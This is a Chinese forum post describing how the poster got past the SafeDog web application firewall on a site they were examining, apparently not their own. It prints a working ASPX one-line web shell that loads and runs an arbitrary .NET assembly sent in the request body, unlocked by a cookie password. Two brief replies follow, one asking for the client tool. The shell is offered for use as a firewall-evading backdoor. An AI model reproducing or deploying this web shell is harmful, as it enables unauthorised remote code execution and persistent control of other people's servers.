可突破安全狗的aspx一句话

小男孩 · 发表于 2012-12-23 17:25:40

在看一个站的时候，发现服务器装了安全狗，刚开始利用IIS6的畸形解析一直被拦截，最后找到了不用畸形解析的办法，传了菜刀的一句话，却连不上，一直返回403，应该是被拦截，后来找了个相对比较生僻的一句话，终于上传并连接成功。

服务端一句话木马：

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端截图：

Free_小东 · 发表于 2012-12-23 21:18:51

楼主不要刷帖

zhangqiuyue · 发表于 2013-2-7 00:15:19

楼主啊· 那工具可以赏给我们不耶！

可突破安全狗的aspx一句话

相关帖子

浏览过的版块

指导单位

旗下站点

联系我们